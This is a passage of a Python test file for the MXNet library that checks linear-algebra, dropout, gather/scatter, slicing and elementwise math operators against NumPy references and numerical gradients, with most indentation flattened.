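# this removes the sign ambiguity before the result feeds the reference backward below.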
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
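# Rough summary of the reference backward above: with temp = grad_u * u^T, the
# off-diagonal entries temp2[i, j] = temp2[j, i] = (temp[i, j] - temp[j, i]) / (2 * (l[i] - l[j]))
# (for i > j) are combined with diag(grad_l) on the diagonal, and the result is
# rotated back as u^T * temp2 * u to give the gradient with respect to the input A.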
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(1896893923)
def test_laop_3():
    # Currently disabled on GPU as syevd needs CUDA 8,
    # and MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
def test_laop_4():
    # Currently disabled on GPU as syevd needs CUDA 8,
    # and MXNet builds use CUDA 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 5):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
                    # test extraction of the triangle by doing a full roundtrip, as the intermediate extracted
                    # triangle has a different ordering than numpy's.
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
# Tests for linalg.inverse
@pytest.mark.skip(reason="Test crashes https://github.com/apache/incubator-mxnet/issues/15975")
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
## det(I + dot(v, v.T)) = 1 + dot(v.T, v) >= 1, so it's always invertible;
## det is away from zero, so the value of logdet is stable
v = np.random.random(4)
a = np.eye(4) + np.outer(v, v)
a = np.tile(a, (3, 1, 1))
permute_mat = np.eye(4)[[1, 0, 2, 3]]
# test matrix inverse
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
# test matrix determinant
# det
r = np.linalg.det(a)
test_det = mx.sym.linalg.det(data)
check_fw(test_det, [a], [r])
check_grad(test_det, [a])
# test slogdet
r1 = np.array([1., 1., 1.])
r2 = np.log(np.abs(np.linalg.det(a)))
test_sign, test_logabsdet = mx.sym.linalg.slogdet(data)
check_fw(test_sign, [a], [r1])
check_fw(test_sign, [np.dot(a, permute_mat)], [-r1])
check_fw(test_logabsdet, [a], [r2])
check_grad(test_logabsdet, [a])
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
## TODO: the test fails intermittently when cuDNN is enabled; the cuDNN code path is
## temporarily disabled until this gets fixed.
## tracked at https://github.com/apache/incubator-mxnet/issues/14288
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
        # Make sure the input contains no zeros (test data setup check)
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
        # The relative error should stay within ratio/2
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y._simple_bind(ctx=default_context(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y._simple_bind(ctx=default_context(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
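    # check_dropout_axes below verifies that with `axes` set, the same dropout mask is
    # broadcast along the dropped axes: every slice taken along such an axis must be
    # identical to slice 0.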
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
# check_dropout_ratio(0.5, shape, cudnn_off=False)
# check_dropout_ratio(0.0, shape, cudnn_off=False)
# check_dropout_ratio(1.0, shape, cudnn_off=False)
# check_dropout_ratio(0.75, shape, cudnn_off=False)
# check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
# check_passthrough(0.5, shape, cudnn_off=False)
# check_passthrough(0.0, shape, cudnn_off=False)
# check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
# check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
# check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
def test_gather_nd_check_bound():
def _test_gather_nd_exception(data, indices):
output = mx.nd.gather_nd(data, indices).asnumpy()
# check if indices is out of bound
data = mx.nd.array([[0, 1, 2], [3, 4, 5]])
indices1 = mx.nd.array([[0, 1, 0], [0, 1, 3]])
indices2 = mx.nd.array([[0, 1, 0], [0, 1, -5]])
assertRaises(IndexError, _test_gather_nd_exception, data, indices1)
# IndexError: index 3 is out of bounds for axis 1 with size 3
assertRaises(IndexError, _test_gather_nd_exception, data, indices2)
# IndexError: index -5 is out of bounds for axis 1 with size 3
# check if the negative indices are wrapped correctly
indices1 = mx.nd.array([[0, 1, -1], [0, 1, -2]])
indices2 = mx.nd.array([[0, 1, 1], [0, 1, 1]])
data1 = mx.nd.gather_nd(data, indices1)
data2 = mx.nd.gather_nd(data, indices2)
assert_almost_equal(data1, data2, rtol=1e-5, atol=1e-5)
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
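# Quick sanity sketch of the two reference functions above (not executed by the tests):
# with sigma = 1 the switch point is |x| = 1/sigma^2 = 1, so
#   np_smooth_l1(np.array([0.5, 2.0]), 1.)      -> [0.125, 1.5]  (0.5*x^2 inside, |x| - 0.5 outside)
#   np_smooth_l1_grad(np.array([0.5, 2.0]), 1.) -> [0.5, 1.0]    (x inside, sign(x) outside)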
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for binary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@pytest.mark.serial
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
